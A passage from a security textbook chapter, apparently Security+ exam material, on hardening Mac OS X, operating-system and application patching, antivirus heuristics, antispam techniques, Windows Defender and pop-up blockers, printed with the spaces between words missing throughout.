hostandportcombinationsin/etc/hosts.allow,administratorscanallowcertainhoststoconnectoncertainports.Thefirewallfunctionandhosts.allowmustworktogetherifbothfunctionsareusedonthesamesystem.Theconnectionmustbeallowedbybothutilitiesoritwillbedropped.
HardeningMacOSXApple’soperatingsystemisessentiallyanewvariantoftheUNIXoperatingsystem.WhilethisPOSIX-compliantOSbringsanewlevelofpower,flexibility,andstabilitytoMacuserseverywhere,italsobringsanewlevelofsecurityconcerns.Traditionally,theMacoperatingsystemwaslargelyignoredbythehackercommunity—thedeploymentwasrelativelysmallandlargelyrestrictedtoindividualusersordepartments.WiththemigrationtoaUNIX-basedOSandariseinthenumberofMacsonthemarket,Macusersshouldanticipateasharpincreaseinunwantedattentionandscrutinyfrompotentialattackers.BecauseitisaUNIX-basedOS,thesameroughguidelinesforallUNIX
systemsapplytoMacOSX.Applehasincludedsomesecurity-specificfeaturestohelpprotectitsuserbase:
MandatoryaccesscontrolsforaccesstosystemresourcesOnlyprocessesthatareexplicitlygrantedaccessareallowedtoaccesssystemresourcessuchasnetworking,filesystems,processexecution,andsoon.
TaggeddownloadsAnyfiledownloadedwithSafari,iChat,orMailisautomaticallytaggedwithmetadata,includingthesourceURL,dateandtimeofdownload,andsoon.Ifthedownloadwasanarchive(suchasazipfile),thesamemetadataistaggedtoanyfileextractedfromthearchive.Usersarepromptedwiththisinformationthefirsttimetheytrytorunoropenthedownloadedfile.
ExecutedisableLeopard(OSX10.5)andbeyondprovidesno-executestackprotection.Essentiallythismeansthatcertainportionsof
thestackhavebeenmarkedas“dataonly”andtheOSwillnotexecuteanyinstructionsinregionsmarkedasdataonly.Thishelpsprotectagainstbuffer-overflowattacks.
LibraryrandomizationInanotherattempttohelpdefeatbuffer-overflowattacks,Leopard(OSX10.5)andbeyondloadssystemlibrariesintorandomlocations,makingitharderforattackerstoreferencestaticsystemlibrarylocationsintheirexploitcode.
FileVaultFileVaultencryptsfileswithAESencryption.Whenthisfeatureisenabled,everythingintheuser’shomedirectoryisautomaticallyencrypted.
Application-awarefirewallTheAppleApplicationfirewallallowsuserstorestrictnetworkaccessonbothaper-applicationandaper-portbasis.
Pre-emptivemultitaskingandmemoryprotectionThesefeaturesprovideameansforthesystemtoensurethatmultipleapplicationscanberunsimultaneouslywithoutinterruptingorcorruptingeachother.
GatekeeperTheGatekeeperapplicationisemployedtomakeitsafertodownloadanddeployapplications.ThecombinationoftheGatekeeperapplicationandthecontrolAppleexertsoverapplicationsinitsAppstoreprovidesoneofthesafestsetsofsoftwaredistribution.
AppSandboxTheAppSandboxinOSXprovidesameansofensuringthatappsareseparatedfromtheOSinwaystoprotectcriticalcomponentsfrommalicioussoftware.
FilepermissionsinOSXarenearlyidenticaltothoseinanyotherUNIXvariantandarebasedonseparateread,write,andexecutepermissionsforowner,group,andworld.Whilethesepermissionscanbeadjustedmanuallyfromacommand-lineinterface,withthestandardchown,chmod,andchgrpcommands,Appleagainprovidessomeniceinterfacecapabilitiesforviewingandmanagingfileanddirectorypermissions.Byselectingthepropertiesofanygivenfileorfolder,the
usercanviewandmodifythepermissionsforthatfileorfolder,asshowninFigure14.9.NotethattheGUIfollowsthesameuser-group-worldpatternofpermissionsthatotherUNIXvariantsfollow,thoughAppleusesthetermothersasopposedtoworld.
•Figure14.9SettingfilepermissionsinMacOSX
ThisGUIallowsuserstorestrictaccesstosensitivefilesanddirectoriesquicklyandeffectively.Bydefault,OSXlimitsauser’sabilitytoaccessormodifycertainareasofthefilesystem,includingthoseareascontainingsystembinaries.However,theserestrictionscanbecircumventedbyauserwiththeappropriatepermissionsorbycertainthird-partyapplications.RemovingunwantedorunnecessaryprogramsinOSXisusuallydone
throughtheprogram’sownuninstallerutilityorbysimplyusingtheFindertolocateandthendeletethefoldercontainingtheprogramandassociatedutilities.LikeWindows,OSXmapscertainfileextensionstospecificprograms,sodeletingaprogramthathandlesspecificextensiontypesmayrequirethatanadministratorclearupassociatedextensions.
LikemostUNIX-basedOSs,OSXisamultiuserplatform.Aspartofthebaseliningeffort,theactiveuseraccountsshouldbeexaminedtoensuretheyhavetherightlevelofaccess,permissions,groupmemberships,andsoon.MacOSXalsopermitsadministratorstolockaccountssothattheycanbemodifiedonlybyuserswithadministrative-levelprivileges.
TherearethreetypesofaccountsinOSX:User,Administrator,andRoot.Useristheaccountwiththelowestprivileges,andtypical“users”shouldbegiventhistypeofaccount.Administratoraccountshave“root-like”permissionsexcepttheycannotadd,modify,ordeletefilesinthesystemdomain.TheRootaccountisessentiallythesameastherootaccountonanyUNIXsystem;however,OSXdisablestheRootaccountbydefault.YoumustenabletheRootaccountifyouwanttouseitonaMac.
Updates(a.k.a.Hotfixes,ServicePacks,andPatches)Operatingsystemsarelargeandcomplexmixesofinterrelatedsoftwaremoduleswrittenbydozensoreventhousandsofseparateindividuals.WiththepushtowardGUI-basedfunctionalityandenhancedcapabilitiesthathasoccurredoverthepastseveralyears,operatingsystemshavecontinuedtogrowandexpand.WindowsVistacontainsapproximately50millionlinesofcode,andthoughitmaybeoneofthelargestinthatrespect,othermodernoperatingsystemsarenotfarbehind.Asoperatingsystemscontinuetogrowandintroducenewfunctions,thepotentialforproblemswiththecodegrowsaswell.Itisalmostimpossibleforanoperatingsystemvendortotestitsproductoneverypossibleplatformundereverypossiblecircumstance,sofunctionalityandsecurityissuesdoariseafteranoperatingsystemhasbeenreleased.Totheaverageuserorsystemadministrator,thismeansafairlyconstantstreamofupdatesdesignedtocorrectproblems,replacesectionsofcode,orevenaddnewfeaturestoaninstalledoperatingsystem.
Vendorstypicallyfollowahierarchyforsoftwareupdates:
HotfixThisisatermgiventoa(usually)smallsoftwareupdatedesignedtoaddressaspecificproblem,suchasabufferoverflowinanapplicationthatexposesthesystemtoattacks.Hotfixesaretypicallydevelopedinreactiontoadiscoveredproblemandareproducedandthenreleasedratherquickly.Hotfixestypicallyaddresscritical,security-relatedissuesandshouldbeappliedtotheaffectedapplicationoroperatingsystemassoonaspossible.
PatchThistermisusuallyappliedtoamoreformal,largersoftwareupdatethatmayaddressseveralormanysoftwareproblems.Patchesoftencontainenhancementsoradditionalcapabilitiesaswellasfixesforknownbugs.Patchesareusuallydevelopedoveralongerperiodoftime.
ServicepackThistermisusuallygiventoalargecollectionofpatchesandhotfixesrolledintoasingle,ratherlargepackage.Servicepacksaredesignedtobringasystemuptothelatestknowngoodlevelallatonce,ratherthanrequiringtheuserorsystemadministratortodownloaddozensorhundredsofupdatesseparately.
Everyoperatingsystem,fromLinuxtoSolaristoWindows,requiressoftwareupdates,andeachoperatingsystemhasdifferentmethodsofassistingusersinkeepingtheirsystemsuptodate.Microsoft,forexample,typicallymakesupdatesavailablefordownloadfromitswebsite.Whilemostadministratorsortechnicallyproficientusersmayprefertoidentifyanddownloadupdatesindividually,Microsoftrecognizesthatnontechnicaluserspreferasimplerapproach,whichMicrosofthasbuiltintoitsoperatingsystems.BeginningwithWindowsVista,andServer2003,Microsoftprovidesanautomatedupdatefunctionalitythatwill,onceconfigured,locateanyrequiredupdates,downloadthemtoyoursystem,andeveninstalltheupdatesifthatisyourpreference.Figure14.10showstheAutomaticUpdateswindow,whichcanbefoundintheControlPanel.Notethatboththeweb-basedupdatesandAutomaticUpdatesrequire
activeInternetconnectionstoretrieveinformationandupdatesfromMicrosoft.
•Figure14.10AutomaticUpdatessettingsinWindows7
TheWindowsUpdateutility(seeFigure14.11)canperformanon-demandsearchforupdatesorbeconfiguredtoscanfor,download,andeveninstallupdatesautomatically—essentiallythesamefunctionsasAutomaticUpdateswithanewlook.AnespeciallynicefeatureofWindowsUpdateistheabilitytoscanforanddownloadpatchesforotherMicrosoftsoftware,suchasOffice,aswellasupdatesandpatchesfortheoperatingsystemitself.
•Figure14.11WindowsUpdateutilityinWindows7
Microsoftisnotaloneinprovidingutilitiestoassistusersinkeepingtheirsystemsuptodateandsecure.FedoraLinuxcontainsautilitycalledthePackageUpdater,showninFigure14.12,whichdoesessentiallythesamething.Runningtheutilitywillshowyouwhichupdatesareavailableandallowyoutoselectwhichupdatestodownloadandapply.Aswithmostoperatingsystems,youcanconfigureFedoratoautomaticallydownloadandapplyavailableupdates.
•Figure14.12Fedorasoftwarepackageupdateutility
Regardlessofthemethodyouusetoupdatetheoperatingsystem,itiscriticallyimportanttokeepsystemsuptodate.Newsecurityadvisoriescomeouteveryday,andwhileabufferoverflowmaybea“potential”problemtoday,itwillalmostcertainlybecomea“definite”probleminthenearfuture.Muchlikethestepstakentobaselineandinitiallysecureanoperatingsystem,keepingeverysystempatchedanduptodateiscriticaltoprotectingthesystemandtheinformationitcontains.
ExamTip:Allsoftwarewillrequirechanges/patchesovertime.Managingpatchesisanessentialelementofasecurityprogram.
OperatingSystemPatchingEveryOS,fromLinuxtoWindows,requiressoftwareupdates,andeachOShasdifferentmethodsofassistingusersinkeepingtheirsystemsuptodate.Microsoft,forexample,typicallymakesupdatesavailablefordownloadfromitswebsite.Whilemostadministratorsortechnicallyproficientusersmayprefertoidentifyanddownloadupdatesindividually,Microsoftrecognizesthatnontechnicaluserspreferasimplerapproach,whichMicrosofthasbuiltintoitsoperatingsystems.InWindows7and8andWindowsServer2012,Microsoftprovidesanautomatedupdatefunctionalitythatwill,onceconfigured,locateanyrequiredupdates,downloadthemtoyoursystem,andeveninstalltheupdatesifthatisyourpreference.InMicrosoftWindows,theWindowsUpdateutility(seeFigure14.11)canperformanon-demandsearchforupdatesorbeconfiguredtoscanfor,download,andeveninstallupdatesautomatically—essentiallythesamefunctionsasAutomaticUpdateswithanewlook.AnespeciallynicefeatureofWindowsUpdateistheabilitytoscanforanddownloadpatchesforotherMicrosoftsoftware,suchasOffice,aswellas
updatesandpatchesfortheOSitself.
TechTip
WindowsUpdatesoftheFutureMicrosofthasannouncedthatbeginningwithWindows10itwilldiscontinuethemonthlypatchdistributionprocessreferredtoasPatchTuesday.Thenewmethodwillbecontinuous,seamlessupdatesinthebackground.Thishasraisedquestionsinenterprisesastohowtheycantestupdatesbeforeapplyingtheminproduction.
HowyoupatchaLinuxsystemdependsagreatdealonthespecificversioninuseandthepatchbeingapplied.Insomecases,apatchwillconsistofaseriesofmanualstepsrequiringtheadministratortoreplacefiles,changepermissions,andalterdirectories.Inothercases,thepatchesareexecutablescriptsorutilitiesthatperformthepatchactionsautomatically.SomeLinuxversions,suchasRedHat,havebuilt-inutilitiesthathandlethepatchingprocess.Inthosecases,theadministratordownloadsaspecificallyformattedfilethatthepatchingutilitythenprocessestoperformanymodificationsorupdatesthatneedtobemade.RegardlessofthemethodyouusetoupdatetheOS,itiscritically
importanttokeepsystemsuptodate.Newsecurityadvisoriescomeouteveryday,andwhileabufferoverflowmaybea“potential”problemtoday,itwillalmostcertainlybecomea“definite”probleminthenearfuture.MuchlikethestepstakentobaselineandinitiallysecureanOS,keepingeverysystempatchedanduptodateiscriticaltoprotectingthesystemandtheinformationitcontains.
ApplicationUpdatesJustasoperatingsystemsneedpatches,sodoapplications.Managingthewidevarietyofapplicationsandtherequiredupdatesfromnumerousdifferentsoftwarevendorscanbeadauntingchallenge.Thishascreatedanichemarketforpatch-managementsoftware.Inmostenterprises,some
formofautomatedpatchmanagementsolutionisused,bothtoreducelaborandtoensureupdatesareappliedappropriatelyacrosstheenterprise.
AntimalwareIntheearlydaysofPCuse,threatswerelimited:mosthomeuserswerenotconnectedtotheInternet24/7throughbroadbandconnections,andthemostcommonthreatwasaviruspassedfromcomputertocomputerviaaninfectedfloppydisk(muchlikethemedicaldefinition,acomputervirusissomethingthatcaninfectthehostandreplicateitself).Butthingshavechangeddramaticallysincethoseearlydays,andcurrentthreatsposeamuchgreaterriskthaneverbefore.AccordingtoSANSInternetStormCenter,theaveragesurvivaltimeofanunpatchedWindowsPContheInternetislessthan60minutes(http://isc.sans.org/survivaltime.html).Thisistheestimatedtimebeforeanautomatedprobefindsthesystem,penetratesit,andcompromisesit.AutomatedprobesfrombotnetsandwormsarenottheonlythreatsroamingtheInternet—therearevirusesandmalwarespreadbye-mail,phishing,infectedwebsitesthatexecutecodeonyoursystemwhenyouvisitthem,adware,spyware,andsoon.Fortunately,asthethreatsincreaseincomplexityandcapability,sodotheproductsdesignedtostopthem.
CrossCheckMalwareMalwarecomesinmanyformsandiscoveredspecificallyinChapter15.Antivirussolutionsandproperworkstationconfigurationsarepartofadefensivepostureagainstvariousformsofmalware.Additionalstepsincludepolicyandprocedureactions,prohibitingfilesharingviaUSBorexternalmedia,andprohibitingaccesstocertainwebsites.
AntivirusAntivirus(AV)productsattempttoidentify,neutralize,orremovemaliciousprograms,macros,andfiles.Theseproductswereinitially
designedtodetectandremovecomputerviruses,thoughmanyoftheantivirusproductsarenowbundledwithadditionalsecurityproductsandfeatures.Althoughantivirusproductshavehadovertwodecadestorefinetheir
capabilities,thepurposeoftheantivirusproductsremainsthesame:todetectandeliminatecomputervirusesandmalware.Mostantivirusproductscombinethefollowingapproacheswhenscanningforviruses:
Signature-basedscanningMuchlikeanintrusiondetectionsystem(IDS),theantivirusproductsscanprograms,files,macros,e-mails,andotherdataforknownworms,viruses,andmalware.Theantivirusproductcontainsavirusdictionarywiththousandsofknownvirussignaturesthatmustbefrequentlyupdated,asnewvirusesarediscovereddaily.Thisapproachwillcatchknownvirusesbutislimitedbythevirusdictionary—whatitdoesnotknowaboutitcannotcatch.
Heuristicscanning(oranalysis)Heuristicscanningdoesnotrelyonavirusdictionary.Instead,itlooksforsuspiciousbehavior—anythingthatdoesnotfitintoa“normal”patternofbehaviorfortheOSandapplicationsrunningonthesystembeingprotected.
Mostcurrentantivirussoftwarepackagesprovideprotectionagainstawiderangeofthreats,includingviruses,worms,Trojans,andothermalware.Useofanup-to-dateantiviruspackageisessentialinthecurrentthreatenvironment.
ExamTip:Heuristicscanningisamethodofdetectingpotentiallymaliciousor“virus-like”behaviorbyexaminingwhataprogramorsectionofcodedoes.Anythingthatis“suspicious”orpotentially“malicious”iscloselyexaminedtodeterminewhetherornotitisathreattothesystem.Usingheuristicscanning,anantivirusproductattemptstoidentifynewvirusesorheavily
modifiedversionsofexistingvirusesbeforetheycandamageyoursystem.
Assignature-basedscanningisafamiliarconcept,let’sexamineheuristicscanninginmoredetail.Heuristicscanningtypicallylooksforcommandsorinstructionsthatarenotnormallyfoundinapplicationprograms,suchasattemptstoaccessareservedmemoryregister.Mostantivirusproductsuseeitheraweight-basedsystemorarule-basedsystemintheirheuristicscanning(moreeffectiveproductsuseacombinationofbothtechniques).Aweight-basedsystemrateseverysuspiciousbehaviorbasedonthedegreeofthreatassociatedwiththatbehavior.Ifthesetthresholdispassedbasedonasinglebehaviororacombinationofbehaviors,theantivirusproductwilltreattheprocess,application,macro,andsoonthatisperformingthebehavior(s)asathreattothesystem.Arule-basedsystemcomparesactivitytoasetofrulesmeanttodetectandidentifymalicioussoftware.Ifpartofthesoftwarematchesarule,orifaprocess,application,macro,andsoonperformsabehaviorthatmatchesarule,theantivirussoftwarewilltreatthatasathreattothelocalsystem.Someheuristicproductsareveryadvancedandcontaincapabilitiesfor
examiningmemoryusageandaddressing,aparserforexaminingexecutablecode,alogicflowanalyzer,andadisassembler/emulatorsotheycan“guess”whatthecodeisdesignedtodoandwhetherornotitismalicious.
Computerviruswriters’intentionshavechangedovertheyears,fromsimplyspreadingavirusandwantingtobenoticed,totoday’sstealthybotnet-creatingcriminals.Onemethodofremaininghiddenistoproducevirusesthatcanmorphtolowertheirdetectionratesbystandardantivirusprograms.Thenumberofvariantsforsomeviruseshasincreasedfromlessthan10togreaterthan10,000.Thisexplosioninsignatureshascreatedtwoissues.One,usersmustconstantly(sometimesmorethandaily)updatetheirsignaturefile.And,moreimportantly,detectionmethodsarehavingtochangeasthenumberofsignaturesbecometoolargetoscanquickly.Forendusers,thebottomlineissimple:updatesignaturesautomatically,andatleastdaily.
AswithIDS/IPSproducts,encryptionandobfuscationposeaproblem
forantivirusproducts:anythingthatcannotbereadcannotbematchedagainstcurrentvirusdictionariesoractivitypatterns.Tocombattheuseofencryptioninmalwareandviruses,manyheuristicscannerslookforencryptionanddecryptionloops.Asmalwareisusuallydesignedtorunaloneandunattended,ifitusesencryption,itmustcontainalltheinstructionstoencryptanddecryptitselfasneeded.Heuristicscannerslookforinstructionssuchastheinitializationofapointerwithavalidmemoryaddress,manipulationofacounter,orabranchconditionbasedonacountervalue.Whiletheseactionsdon’talwaysindicatethepresenceofanencryption/decryptionloop,iftheheuristicenginecanfindaloop,itmightbeabletodecryptthesoftwareinaprotectedmemoryspace,suchasanemulator,andevaluatethesoftwareinmoredetail.Manyvirusessharecommonencryption/decryptionroutinesthathelpantivirusdevelopers.Currentantivirusproductsarehighlyconfigurableandmostofferings
willhavethefollowingcapabilities:
AutomatedupdatesPerhapsthemostimportantfeatureofagoodantivirussolutionisitsabilitytokeepitselfuptodatebyautomaticallydownloadingthelatestvirussignaturesonafrequentbasis.ThisusuallyrequiresthatthesystembeconnectedtotheInternetinsomefashionandthatupdatesbeperformedonadaily(ormorefrequent)basis.
AutomatedscanningMostantivirusproductsallowfortheschedulingofautomatedscanssothatyoucandesignatewhentheantivirusproductwillexaminethelocalsystemforinfectedfiles.Theseautomatedscanscantypicallybescheduledforspecificdaysandtimes,andthescanningparameterscanbeconfiguredtospecifywhatdrives,directories,andtypesoffilesarescanned.
MediascanningRemovablemediaisstillacommonmethodforvirusandmalwarepropagation,andmostantivirusproductscanbeconfiguredtoautomaticallyscanopticalmedia,USBdrives,memorysticks,oranyothertypeofremovablemediaassoonastheyareconnectedtooraccessedbythelocalsystem.
ManualscanningManyantivirusproductsallowtheusertoscandrives,files,ordirectories(folders)“ondemand.”
E-mailscanningE-mailisstillamajormethodofvirusandmalwarepropagation.Manyantivirusproductsgiveuserstheabilitytoscanbothincomingandoutgoingmessagesaswellasanyattachments.
ResolutionWhentheantivirusproductdetectsaninfectedfileorapplication,itcantypicallyperformoneofseveralactions.Theantivirusproductmayquarantinethefile,makingitinaccessible;itmaytrytorepairthefilebyremovingtheinfectionoroffendingcode;oritmaydeletetheinfectedfile.Mostantivirusproductsallowtheusertospecifythedesiredaction,andsomeallowforanescalationinactionssuchascleaningtheinfectedfileifpossibleandquarantiningthefileifitcannotbecleaned.
Antivirussolutionsaretypicallyinstalledonindividualsystems(desktops,servers,andevenmobiledevices),butnetwork-basedantiviruscapabilitiesarealsoavailableinmanycommercialgatewayproducts.Thesegatewayproductsoftencombinefirewall,IDS/IPS,andantiviruscapabilitiesintoasingleintegratedplatform.Mostorganizationswillalsoemployantivirussolutionsone-mailservers,asthatcontinuestobeaverypopularpropagationmethodforviruses.Whiletheinstallationofagoodantivirusproductisstillconsidereda
necessarybestpractice,thereisgrowingconcernabouttheeffectivenessofantivirusproductsagainstdevelopingthreats.Earlyvirusesoftenexhibiteddestructivebehaviors;werepoorlywritten,modifiedfiles;andwerelessconcernedwithhidingtheirpresencethantheywerewithpropagation.Weareseeinganemergenceofvirusesandmalwarecreatedbyprofessionals,sometimesfinancedbycriminalorganizationsorgovernments,whichgotogreatlengthstohidetheirpresence.ThesevirusesandmalwareareoftenusedtostealsensitiveinformationorturntheinfectedPCintopartofalargerbotnetforuseinspammingorattackoperations.
ExamTip:Antivirusisanessentialsecurityapplicationonallplatforms.Therearecomplianceschemesthatmandateantivirusdeployment,suchasPCIDSSandNERCCIP.
AntivirusSoftwareforServersTheneedforantivirusprotectiononserversdependsagreatdealontheuseoftheserver.Sometypesofservers,suchase-mailservers,requireextensiveantivirusprotectionbecauseoftheservicestheyprovide.Otherservers(domaincontrollersandremoteaccessservers,forexample)maynotrequireanyantivirussoftware,astheydonotallowuserstoplacefilesonthem.Fileserversneedprotection,asdocertaintypesofapplicationservers.Thereisnogeneralrule,soeachserveranditsroleinthenetworkwillneedtobeexaminedtodeterminewhetheritneedsantivirussoftware.
AntivirusSoftwareforWorkstationsAntiviruspackagesareavailablefromawiderangeofvendors.Runninganetworkofcomputerswithoutthisbasiclevelofprotectionwillbeanexerciseinfutility.Eventhoughthenumberofwidespread,indiscriminatebroadcastvirusattackshasdecreasedbecauseoftheeffectivenessofantivirussoftware,itisstillnecessarytouseantivirussoftware;thetimeandmoneyyouwouldspendcleaningupafteravirusattackmorethanequalsthecostofantivirusprotection.ThemajorityofvirusestodayexisttocreatezombiemachinesforbotnetsthatenableotherstocontrolresourcesonyourPC.Evenmoreimportant,onceconnectedbynetworks,computerscanspreadavirusfrommachinetomachinewithaneasethat’sevengreaterthansimpleUSBflashdrivetransfer.Oneunprotectedmachinecanleadtoproblemsthroughoutanetworkasothermachineshavetousetheirantivirussoftwaretoattempttocleanupaspreadinginfection.AppleMaccomputerswereonceconsideredbymanyuserstobe
immunebecauseveryfewexamplesofmalicioussoftwaretargetingMacs
existed.Thiswasnotduetoanythingotherthanalowmarketshare,andhencethedeviceswereignoredbythemalwarecommunityasawhole.AsMachasincreasedinmarketshare,sohasitsexposure,andtodayavarietyofMacOSXmalwarestealsfilesandpasswordsandisevenusedtotakeusers’pictureswiththecomputer’sbuilt-inwebcam.Allusermachinesneedtoinstallantivirussoftwareintoday’senvironment,becauseanycomputercanbecomeatarget.
AntispamIfyouhaveane-mailaccount,you’velikelyreceivedspam,thatendlessstreamofunsolicited,electronicjunkmailadvertisingget-rich-quickschemes,askingyoutovalidateyourbankaccount’spassword,orinvitingyoutovisitonewebsiteoranother.Despitefederallegislation(suchastheCAN-SPAMActof2003)andpromisesfromITindustrygiantslikeBillGates(“Twoyearsfromnow,spamwillbesolved”—2004),spamisaliveandwellandfillingupyourinboxasyoureadthis.Industryexpertshavebeenfightingthespambattleforyears,andwhilesignificantprogresshasbeenmadeinthedevelopmentofantispamproducts,unfortunatelythespammershaveproventobeverycreativeandverydedicatedintheirquesttofillyourinbox.
Spamisnotanewproblem.It’sreportedthatthefirstspammessagewassentonMay1,1978byaDigitalEquipmentCorporationsalesrepresentative.ThissalesrepresentativeattemptedtosendamessagetoallARPANETusersontheWestCoast.
Antispamproductsattempttofilteroutthatendlessstreamofjunke-mailsoyoudon’thaveto.Someantispamproductsoperateatthecorporatelevel,filteringmessagesastheyenterorleavedesignatedmailservers.Otherproductsoperateatthehostlevel,filteringmessagesastheycomeintoyourpersonalinbox.Mostantispamproductsusesimilartechniquesandapproachesforfilteringoutspam:
BlacklistingSeveralorganizationsmaintainlistsofserversordomainsthatgenerateorhavegeneratedspam.Mostgateway-orserver-levelproductscanreferencetheseblacklistsandautomaticallyrejectanymailcomingfromserversordomainsontheblacklists.
HeaderfilteringTheantispamproductslookatthemessageheaderstoseeiftheyareforged.E-mailheaderstypicallycontaininformationsuchassender,receiver,serversusedtotransmitthemessage,andsoon.Spammersoftenforgeinformationinmessageheadersinanattempttohidewherethemessageisreallycomingfrom.
ContentfilteringThecontentofthemessageisexaminedforcertainkeywordsorphrasesthatarecommontospambutrarelyseeninlegitimatee-mails(“getrichnow”forexample).Unfortunately,contentfilteringdoesoccasionallyflaglegitimatemessagesasspam.
LanguagefilteringSomespamproductsallowyoutofilteroute-mailswrittenincertainlanguages.
User-definedfilteringMostantispamproductsallowenduserstodeveloptheirownfilters,suchasalwaysallowinge-mailfromaspecificsourceevenifitwouldnormallybeblockedbyacontentfilter.
TrappingSomeproductswillmonitorunpublishede-mailaddressesforincomingspam—anythingsenttoanunpublishedandotherwiseunusedaccountislikelytobespam.
EnforcingthespecificationsoftheprotocolSomespam-generationtoolsdon’tproperlyfollowtheSMTPprotocol.ByenforcingthetechnicalrequirementsofSMTP,somespamcanberejectedasdeliveryisattempted.
EgressfilteringThistechniquescansmailasitleavesanorganizationtocatchspambeforeitissenttootherorganizations.
CrossCheckSpamThetopicofspamandalltheinterestingdetailsofundesirede-mailispresentedinChapter16.Spamislistedhereasitisconsideredaclientthreat,butthemainmethodsofcombatingspamarecoveredinChapter16.
AntispywareMostantivirusproductswillincludeantispywarecapabilitiesaswell.Whileantivirusprogramsweredesignedtowatchforthewritingoffilestothefilesystem,manycurrentformsofmalwareavoidthefilesystemtoavoidthisformofdetection.Newerantivirusproductsareadaptingandscanningmemoryaswellaswatchingfilesystemaccessinanattempttodetectadvancedmalware.Spywareisthetermusedtodefinemalwarethatisdesignedtostealinformationfromthesystem,suchaskeystrokes,passwords,PINs,andkeys.Antispywarehelpsprotectyoursystemsfromtheever-increasingfloodofmalwarethatseekstowatchyourkeystrokes,stealyourpasswords,andreportsensitiveinformationbacktoattackers.Manyoftheseattackvectorsworkinsystemmemorytoavoideasydetection.
WindowsDefenderAspartofitsongoingeffortstohelpsecureitsPCoperatingsystems,MicrosoftreleasedafreeutilitycalledWindowsDefenderinFebruary2006.ThestatedpurposeofWindowsDefenderistoprotectyourcomputerfromspywareandotherunwantedsoftware(http://windows.microsoft.com/en-us/windows/using-defender#1TC=windows-7).WindowsDefenderisstandardwithallversionsoftheVistaandWindows7operatingsystemsandisavailableviafreedownloadinboth32-and64-bitversions.Ithasthefollowingcapabilities:
SpywaredetectionandremovalWindowsDefenderisdesignedtofindandremovespywareandotherunwantedprogramsthatdisplaypop-ups,modifybrowserorInternetsettings,orstealpersonalinformationfromyourPC.
ScheduledscanningYoucanschedulewhenyouwantyoursystemtobescannedoryoucanrunscansondemand.
AutomaticupdatesUpdatestotheproductcanbeautomaticallydownloadedandinstalledwithoutuserinteraction.
Real-timeprotectionProcessesaremonitoredinrealtimetostopspywareandmalwarewhentheyfirstlaunch,attempttoinstallthemselves,orattempttoaccessyourPC.
SoftwareExplorerOneofthemoreinterestingcapabilitieswithinWindowsDefenderistheabilitytoexaminethevariousprogramsrunningonyourcomputer.WindowsDefenderallowsyoutolookatprogramsthatrunautomaticallyonstartup,arecurrentlyrunningonyourPC,orareaccessingnetworkconnectionsonyourPC.WindowsDefenderprovidesyouwithdetailssuchasthepublisherofthesoftware,whenitwasinstalledonyourPC,whetherornotthesoftwareis“good”orconsideredtobeknownmalware,thefilesize,publicationdate,andotherinformation.
ConfigurableresponsesWindowsDefenderletsyouchoosewhatactionsyouwanttotakeinresponsetodetectedthreats(seeFigure14.13);youcanautomaticallydisablethesoftware,quarantineit,attempttouninstallit,andperformothertasks.
•Figure14.13WindowsDefenderconfigurationoptions
Pop-upBlockersOneofthemostannoyingnuisancesassociatedwithwebbrowsingisthepop-upad.Pop-upadsareonlineadvertisementsdesignedtoattractwebtraffictospecificwebsites,capturee-mailaddresses,advertiseaproduct,andperformothertasks.Ifyou’vespentmorethananhoursurfingtheWeb,you’veundoubtedlyseenthem.They’recreatedwhenthewebsiteyouarevisitingopensanewwebbrowserwindowforthesolepurposeofdisplayinganadvertisement.Pop-upadstypicallyappearinfrontofyourcurrentbrowserwindowtocatchyourattention(anddisruptyourbrowsing).Pop-upadscanrangefrommildlyannoying,generatingoneortwopop-ups,tosystemcripplingifamaliciouswebsiteattemptstoopenthousandsofpop-upwindowsonyoursystem.Similartothepop-upadisthepop-underadthatopensupbehindyour
currentbrowserwindow.Youwon’tseetheseadsuntilyourcurrentwindowisclosed,andtheyareconsideredbysometobelessannoyingthanpop-ups.Anotherformofpop-upisthehoveradthatusesDynamicHTMLtoappearasafloatingwindowsuperimposedoveryourbrowserwindow.Tosomeusers,pop-upadsareasundesirableasspam,andmanywebbrowsersnowallowuserstorestrictorpreventpop-upswithfunctionalityeitherbuiltintothewebbrowseroravailableasanadd-on.InternetExplorercontainsabuilt-inPop-upBlocker(showninFigure14.14andavailablefromtheToolsmenuinInternetExplorer11).
•Figure14.14Pop-upBlockerinIE11
Firefoxalsocontainsabuilt-inpop-upblocker(availablebychoosing
Tools|OptionsandthenselectingtheContenttab).Popularadd-onssuchastheGoogleandYahoo!toolbarsalsocontainpop-upblockers.Ifthesefreelyavailableoptionsarenotenoughforyourneeds,manycommercialsecuritysuitesfromMcAfee,Symantec,andCheckPointcontainpop-upblockingcapabilitiesaswell.Usersmustbecarefulwhenselectingapop-upblocker,assomeunscrupulousdevelopershavecreatedadwareproductsdisguisedasfreepop-upblockersorothersecuritytools.
ExamTip:Pop-upblockersareusedtopreventwebsitesfromopeningadditionalwebbrowserwindowsortabswithoutspecificuserconsent.
Pop-upsadscanbegeneratedinanumberofways,includingJavaScriptandAdobeFlash,andaneffectivepop-upblockermustbeabletodealwiththemanymethodsusedtocreatepop-ups.Whenapop-upiscreated,userstypicallycanclickacloseorcancelbuttoninsidethepop-uporclosethenewwindowusingamethodavailablethroughtheOS,suchasclosingthewindowfromthetaskbarinWindows.Withtheadvancedfeaturesavailabletotheminawebdevelopmentenvironment,someunscrupulousdevelopersprogramthecloseorcancelbuttonintheirpop-upstolaunchnewpop-ups,redirecttheuser,runcommandsonthelocalsystem,orevenloadsoftware.Pop-upsshouldnotbeconfusedwithadware.Pop-upsareadsthat
appearasyouvisitwebpages.Adwareisadvertising-supportedsoftware.Adwareautomaticallydownloadsanddisplaysadsonyourcomputeraftertheadwarehasbeeninstalled,andtheseadsaretypicallyshownwhilethesoftwareisbeingused.Adwareisoftentoutedas“free”software,astheuserpaysnothingforthesoftwarebutmustagreetoallowadstobedownloadedanddisplayedbeforeusingthesoftware.Thisapproachisverypopularonsmartphonesandmobiledevices.
